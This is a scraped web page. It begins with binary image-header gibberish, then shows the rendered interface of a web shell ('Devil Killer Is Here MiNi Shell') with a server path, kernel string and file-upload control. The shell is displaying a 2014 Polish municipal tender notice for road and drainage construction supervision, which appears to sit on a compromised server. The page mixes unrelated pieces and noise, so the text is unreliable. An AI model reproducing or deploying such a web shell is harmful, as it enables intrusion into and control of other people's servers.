JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140304/45779-N-2014.html

<p class="kh_header"><b>Dąbrowa Górnicza: Sprawowanie nadzoru budowlanego w zakresie wykonywania funkcji inspektora nadzoru inwestorskiego nad realizacją umów i robót realizowanych przez Wydział Komunikacji i Drogownictwa Urzędu Miejskiego w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 45779 - 2014; data zamieszczenia: 04.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie nadzoru budowlanego w zakresie wykonywania funkcji inspektora nadzoru inwestorskiego nad realizacją umów i robót realizowanych przez Wydział Komunikacji i Drogownictwa Urzędu Miejskiego w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres przedmiotu zamówienia wchodzi:

1. Sprawowanie nadzoru budowlanego nad realizacją zadań drogowych będących w kompetencjach Wydziału Komunikacji i Drogownictwa, wykonywanych w ramach umów z poszczególnymi wykonawcami,  w szczególności:

 1.1 Sprawowanie nadzoru budowlanego nad robotami związanymi z bieżącym utrzymaniem dróg i infrastruktury pasa drogowego w Gminie Dąbrowa Górnicza, w których zakres w szczególności wchodzi:
a)	usuwanie pojedynczych i grupowych ubytków w nawierzchniach jezdni, chodników, parkingów, placów, zatok itp. elementów pasa drogowego,
b)	przebudowa, naprawa otwartych i przewodowych urządzeń odwadniających na odcinkach dróg, o ile wymagać będzie tego zakres bieżącego utrzymania,
c)	usuwanie skutków działania żywiołów, nadzwyczajnych zagrożeń środowiska itp. w pasie drogowym
d)	prace konserwacyjne obiektów inżynierskich (mosty, wiadukty, przepusty)
e)	odtwarzanie poboczy dróg,
f)	przebudowa nawierzchni dróg w granicach wydzielonego pasa drogowego
g)	przebudowa chodników i uzupełnianie brakujących odcinków ciągów pieszych, zatok parkingowych, miejsc postojowych dla samochodów itp. 
h)	frezowanie i układanie nawierzchni asfaltowej na odcinkach jezdni wskazanych przez Zamawiającego, o ile wymagać będzie tego stan techniczny nawierzchni,
i)	utwardzanie dróg dojazdowych,
j)	wymiana istniejących krawężników, obrzeży lub układanie nowych ,
k)	roboty nieprzewidziane i zamienne, których wykonanie będzie konieczne dla prawidłowej realizacji przedmiotu zamówienia określonego w pkt a) - k) jak na przykład:
-	likwidacje lub przekładki niezinwentaryzowanego uzbrojenia podziemnego,
-	przekładki, odbudowa lub wymiana armatury uzbrojenia, fragmentów ogrodzeń, szaf zasilających, studni teletechnicznych, 
-	karczowanie lub frezowanie pni.
Uwaga: Aktualnie zadanie wykonywane jest na podstawie dwóch umów:
 Bieżące utrzymanie sieci dróg wraz z obiektami inżynierskimi, których zarządca jest Prezydent Miasta Dąbrowy Górniczej w dzielnicach: Centrum, Gołonóg, Stara Dąbrowa, Marianki, Ratanice, Korzeniec. 
- nr ZP.WKD.272.14.2012
- wartość brutto: 15.883.265,52 PLN,
- czas realizacji: 23.04.2012r. - 23.04.2016r. ;
      Bieżące utrzymanie sieci dróg wraz z obiektami inżynierskimi, których zarządcą jest Prezydent Miasta w Dąbrowie Górniczej w dzielnicach: Łosień, Łęka, Okradzionów, Błędów, Ząbkowice, Ujejsce, Strzemieszyce, Trzebiesławice, Tucznawa
- nr ZP.WKD.272.57.2011
- wartość brutto: 12.714.496,68 PLN,
- czas realizacji: 28.09.2011r. - 28.09.2015r.

1.2 Sprawowanie nadzoru budowlanego nad robotami związanymi  z renowacją rowów odwadniających oraz zbieraniem nadmiarów ziemi z poboczy dróg, w których zakres  szczególności wchodzi: 
a) czyszczenie rowów z wyprofilowaniem skarp i dna rowu
b) czyszczenie poboczy rowów
c) umacnianie skarp płytami ażurowymi
d) umacnianie dna rowów korytkami betonowymi
e) umacnianie skarp i dna rowów płytkami
f) czyszczenie przepustów  z namułu
g) wykonywanie przepustów rurowych wraz ze ściankami czołowymi pod zjazdami
h) humusowanie i obsiewanie skarp mieszanką traw
i) ścinanie poboczy wraz z ręcznym plantowaniem
j) wykonywanie przykanalików i studzienek ściekowych.
Uwaga: Aktualnie zadanie wykonywane jest na podstawie umowy:
Renowacja rowów odwadniających oraz zbieranie nadmiarów ziemi z poboczy   
 dróg na terenie gminy Dąbrowa Górnicza. 
- nr ZP.WKD.271.4.124.2011
- wartość brutto: 3.025.988,45 PLN,
- czas realizacji 15.02.2012r. - 15.02.2015r.

1.3. Sprawowanie nadzoru budowlanego nad robotami budowlanymi w związku z zadaniem pn.: Prowadzenie działań w zakresie zarządu dróg, zgodnie z ustawą z dnia 21 marca 1985r. o drogach publicznych (tekst jednolity Dz.U. z 2013r., poz. 260 z późn. zm.), których zarządcą jest Prezydent Miasta Dąbrowa Górnicza oraz realizacja zadań związanych z bezpieczeństwem  w ruchu drogowym, w których zakres w szczególności wchodzi:
- naprawa zniszczonych, uszkodzonych nawierzchni znajdujących w obrębie pasa drogowego (np. jezdni, chodników, poboczy) powodujących zagrożenia w ruchu.
Uwaga: Aktualnie zadanie realizowane jest na podstawie umowy:
Prowadzenie działań w zakresie zarządu dróg, zgodnie z ustawą z dnia 21 marca 1985r. o drogach publicznych (tekst jednolity Dz.U. z 2013r. poz. 260 z późn. zm.), których zarządcą jest Prezydent Miasta Dąbrowa Górnicza oraz realizacja zadań związanych z bezpieczeństwem w ruchu drogowym. 
- nr : ZP.WKD.272.44.2012, 
- wartość brutto: 22.687.979,27 PLN w tym: 6.000.000 PLN na roboty budowlane związane z remontami nawierzchni znajdujących się w obrębie pasa drogowego,
- czas realizacji 20.07.2012r. - 19.07.2015r.

1.4. Sprawowanie nadzoru budowlanego nad robotami realizowanymi w związku z umową pn.: Całodobowa eksploatacja i bieżące utrzymanie sieci kanalizacji deszczowej  i ogólnospławnej znajdującej się w gminie Dąbrowa Górnicza, w których zakres w szczególności wchodzi:
a)	dokonywanie kontrolnych obchodów sieci w terminach uzgodnionych z Zamawiającym,
b)	przegląd kanałów zamkniętych, odkrytych, wylotów do cieków, studni, wpustów ulicznych, pompowni, polegające na sprawdzeniu ich drożności oraz stanu technicznego bezpośrednio w czasie obchodu,
c)	przegląd przy pomocy kamer TV odcinków sieci na zlecenie pisemne lub telefoniczne Zamawiającego. Na podstawie danych z monitoringu TV ustalany będzie niezbędny zakres prac remontowych siec,
d)	czyszczenie kanałów zamkniętych przy użyciu sprzętu zmechanizowanego w tym wielofunkcyjnych samochodów do czyszczenia ciśnieniowego kanałów i wpustów. Przy użyciu samochodów do ciśnieniowego czyszczenia należy czyścić następujące obiekty i urządzenia miejskiej sieci kanalizacji deszczowej: 
- kanały deszczowe i ogólnospławne,
- komory i studnie rewizyjne,
- studnie osadnikowe wpustów,
- przepompownię ścieków deszczowych,
e)	usuwanie powstałych zatorów oraz wycinaniem korzeni w kanałach na zlecenie pisemne bądź telefoniczne Zamawiającego,
f)	czyszczenie studzienek i wpustów ulicznych wraz z wywozem nieczystości, w sposób gwarantujący przestrzeganie ustawy z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz .21 z późn. zm),
g)	zapewnienie prawidłowego ułożenia włazów i przykryć wpustów ulicznych wraz z bieżącym ich uzupełnianiem w przypadku ich braku oraz wymianą w przypadku uszkodzeń (koszt materiałów pokrywa Zamawiający po przedstawieniu listy uzupełnionych elementów w poszczególnych kwartałach roku),
h)	czyszczenie krat zainstalowanych na przepustach, kanałów odkrytych wraz z odwozem wydobytego odpadu w sposób gwarantujący przestrzeganie ustawy z dnia 14 grudnia 2012r.              o odpadach (Dz. U. z 2013r. poz .21 z późn. zm.),
i)	usuwanie awarii kanalizacyjnych powodujących niedrożność przepływu,
j)	konserwacja kanalizacji i obiektów w zakresie budowlanym, uzgodnionym uprzednio 
z Zamawiającym polegającym np. na uszczelnianiu połączeń, naprawie miejsc uszkodzonych          w kanałach, studzienkach i wpustach,
k)	zgłaszanie Zamawiającemu zakłóceń pracy sieci wraz z załączoną do nich dokumentacją fotograficzną miejsca, w którym wystąpiły awarie czy zakłócenia,
l)	usuwanie usterek na kanalizacji zgłaszanych przez mieszkańców,
m) usuwanie awarii związanych z nieprawidłowym działaniem sieci kanalizacji deszczowej lub ogólnospławnej , powodującym zagrożenie lub poważne uciążliwości dla mieszkańców,
n)  prowadzenie prac związanych z uzgadnianiem dokumentacji i uczestnictwo w odbiorach nowo budowanych sieci kanalizacji deszczowej i ogólnospławnej.

Uwaga: Aktualnie zadanie realizowane jest na podstawie umowy: Eksploatacja i bieżące utrzymanie sieci kanalizacji deszczowej i ogólnospławnej na terenie gminy Dąbrowa Górnicza
- nr : ZP.WKD.272.40.2013
- wartość brutto: 5.510.400,00 zł.
- czas realizacji: 27.08.2013r. - 27.08.2016r.

1.5. Z uwagi na konieczność zapewnienia ciągłości wykonywania w/w zadań nadzór budowlany będzie sprawowany także nad realizacją zadań drogowych wykonywanych na podstawie umów, które na analogiczny przedmiot i zakres zostaną zawarte w przyszłości i będą obowiązywać po upływie ważności aktualnych umów. 

2.  Określanie i uzgadnianie z Wykonawcą robót i Zamawiającym technologii planowanych do realizacji robót.
3. Opracowanie przedmiarów robót dla planowanych do realizacji robót.

4. Określanie  zakresu rzeczowego zlecanych do realizacji robót.

5. Udział w pracach komisji przetargowych dotyczących postępowań, których przedmiotem są zadania Wydziału Komunikacji i Drogownictwa.

6.  Udział w wizjach lokalnych dotyczących wnoszonych pism do tutejszego Wydziału,

7. Uczestnictwo w odbiorach robót zadań realizowanych w pasie drogowym ulic będących w zarządzie Prezydenta Miasta Dąbrowy Górniczej.

8. Przygotowanie warunków technicznych niezbędnych do sporządzenia dokumentacji projektowej na odprowadzenie wód opadowych do przydrożnych rowów.

9. W ramach umowy Wykonawca zobowiązuje  się służyć doradztwem technicznym w zakresie tematów technologicznych, biorąc udział w naradach oraz udzielając pisemnych odpowiedzi na zapytania Zamawiającego.

10. Wykaz umów, których dotyczy sprawowanie nadzoru budowlanego stanowić będzie załącznik nr 1 do umowy.

10.1 Wykaz będzie aktualizowany na drodze aneksu w momencie wygaśnięcia lub zawarcia umowy na realizację zadań drogowych.

11.W  ramach realizacji usługi stanowiącej przedmiot zamówienia Wykonawca zobowiązany będzie do:
a) świadczenia czynności stanowiących przedmiot zamówienia w dni powszednie w godzinach pracy Urzędu Miejskiego, tj. 7.30-15.30. W w/w godzinach Wykonawca zobowiązany będzie do zapewnienia ciągłego nadzoru budowlanego.
b) o ile wystąpi  taka konieczność, w sytuacji awaryjnej, realizowania przedmiotu umowy również na wydłużonej zmianie, jak również w dni wolne nie wymienione w ppkt. a). W okresie realizacji umowy są  to sytuacje sporadyczne, Zamawiający zakłada, że w ciągu miesiąca w czasie realizacji niniejszej umowy mogą wystąpić około 4 razy.
c) Wykonawca winien dysponować własnym środkiem transportu i łączności, których użycie należy uwzględnić w kalkulacji ceny ofertowej.

12. Zamawiający zobowiązuje się udostępnić Wykonawcy na jego żądanie dokumenty związane                     z realizacją zadań będących przedmiotem niniejszej umowy.
13.Uprawnienia, zakres i obowiązki przy sprawowaniu nadzoru budowlanego dotyczącego pełnienia funkcji inspektora nadzoru budowlanego regulują obowiązujące przepisy prawne, a w szczególności Ustawa z dnia 7 lipca 1994r. - Prawo budowlane ( tekst jednolity Dz.U. z 2013r., poz. 1409 z późn. zm.).

14. Ubezpieczenie od odpowiedzialności cywilnej.
Wykonawca winien zapewnić ciągłość ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 600.000,00 zł. w okresie obowiązywania  umowy. 

15.  Personel obcojęzyczny
W przypadku zatrudnienia przez Wykonawcę personelu obcojęzycznego, Wykonawca zapewni ciągłą możliwość porozumiewania się personelu Zamawiającego z personelem Wykonawcy w języku polskim..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust.1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał  lub jest w trakcie wykonywania usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.:
1. minimum 1 usługi polegającej na nadzorowaniu robót drogowych w pasie drogowym przy odbywającym się ruchu pojazdów o wartości usługi nie mniejszej niż 100.000 zł brutto uzyskanej w okresie nie dłuższym niż 12 kolejno następujących po sobie miesięcy;
2. minimum 1 usługi polegającej na nadzorowaniu robót kanalizacyjnych w pasie drogowym przy odbywającym się ruchu pojazdów o wartości usługi nie mniejszej niż 25.000 zł brutto uzyskanej w okresie nie dłuższym niż 12 kolejno następujących po sobie miesięcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust.1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
1. min. 2 osobami posiadającymi uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej w zakresie dróg zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r., Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów.
 2. min. 2 osobami posiadającymi uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej w zakresie mostów zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych                           w budownictwie Dz. U. z 2006r., Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów . 
3. min. 2 osobami posiadającymi uprawnienia budowlane bez ograniczeń do kierowania budową             i robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006               w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. z 2006r., Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowiązujących przepisów.   
Ww. osoby winny posiadać min. 3 letnie doświadczenie w nadzorowaniu robót. 
Zamawiający dopuszcza możliwość posiadania uprawnień do dwóch zakresów przez jedną osobę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej         z przedmiotem zamówienia na kwotę nie mniejszą niż 600.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W wykazie nie należy podawać informacji o usługach niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2.  pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
